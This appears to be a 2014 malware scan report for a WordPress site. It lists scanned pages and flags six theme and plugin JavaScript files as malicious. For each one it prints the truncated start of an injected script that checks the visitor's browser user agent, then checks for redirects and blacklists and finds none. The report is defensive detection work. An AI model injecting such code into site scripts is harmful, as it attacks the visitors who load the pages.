Scanned pages/files
| Request | Server response | Status |
http://gestiondeempresas.org/ | 200 OK Content-Length: 42466 Content-Type: text/html | clean |
http://gestiondeempresas.org/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://gestiondeempresas.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://gestiondeempresas.org/wp-content/plugins/jquery-image-lazy-loading/js/jquery.lazyload.min.js?ver=1.7.1 | 200 OK Content-Length: 5249 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/themes/wp-clear321/js/flexslider.js?ver=4.0 | 200 OK Content-Length: 43157 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' switch (options) { case "play": $slider.play(); break; case "pause": $slider.pause(); break; case "next": $slider.flexAnimate($slider.getTarget("next"), true); break; case "prev": case "previous": $slider.flexAnimate($slider.getTarget("prev"), true); break; default: if (typeof options === "number") $slider.flexAnimate(options, true); } } } })(jQuery); Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/themes/wp-clear321/js/external.js?ver=4.0 | 200 OK Content-Length: 2401 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' } }; })(); if (!document.getElementsByTagName) return; var anchors = document.getElementsByTagName("a"); for (var i=0; i<anchors.length; i++) { var anchor = anchors[i]; if (anchor.getAttribute("href") && anchor.getAttribute("rel") == "external") anchor.target = "_blank"; } } window.onload = externalLinks; Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/themes/wp-clear321/js/suckerfish.js?ver=4.0 | 200 OK Content-Length: 2444 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' } }; })(); var sfEls = document.getElementById("topnav").getElementsByTagName("li"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/themes/wp-clear321/js/suckerfish-cat.js?ver=4.0 | 200 OK Content-Length: 2444 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' } }; })(); var sfEls = document.getElementById("catnav").getElementsByTagName("li"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/themes/wp-clear321/js/jquery.mobilemenu.js?ver=4.0 | 200 OK Content-Length: 3864 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' } $('<option />', { "value" : this.href, "html" : optText, "selected" : (this.href == window.location.href) }).appendTo( '.' + settings.className ); }); $('.' + settings.className).change(function(){ var locations = $(this).val(); if( locations !== '#' ) { window.location.href = $(this).val(); }; }); }); return this; }; })(jQuery); Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/javascript | clean |
http://gestiondeempresas.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.3 | 200 OK Content-Length: 9658 Content-Type: application/javascript | clean |
http://gestiondeempresas.org/sobre-el-sitio/ | 200 OK Content-Length: 23795 Content-Type: text/html | clean |
http://gestiondeempresas.org/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://gestiondeempresas.org/sobre-el-sitio/gestion-de-empresas/ | 200 OK Content-Length: 38931 Content-Type: text/html | clean |
http://gestiondeempresas.org/contacto/ | 200 OK Content-Length: 23855 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gestiondeempresas.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Oct 2014 20:08:02 GMT
Server: nginx/1.6.2
Vary: Cookie
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_2828210827=54383ca1a664f; expires=Fri, 10-Oct-2014 20:38:01 GMT; path=/; httponly
X-Pingback: http://gestiondeempresas.org/xmlrpc.php
GET / HTTP/1.1
Host: gestiondeempresas.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Oct 2014 20:08:02 GMT
Server: nginx/1.6.2
Vary: Cookie
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_2828210827=54383ca1a664f; expires=Fri, 10-Oct-2014 20:38:01 GMT; path=/; httponly
X-Pingback: http://gestiondeempresas.org/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: gestiondeempresas.org
Referer: http://www.google.com/search?q=gestiondeempresas.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gestiondeempresas.org
Referer: http://www.google.com/search?q=gestiondeempresas.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gestiondeempresas.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gestiondeempresas.org/
Result: gestiondeempresas.org is not infected or malware details are not published yet.
Result: gestiondeempresas.org is not infected or malware details are not published yet.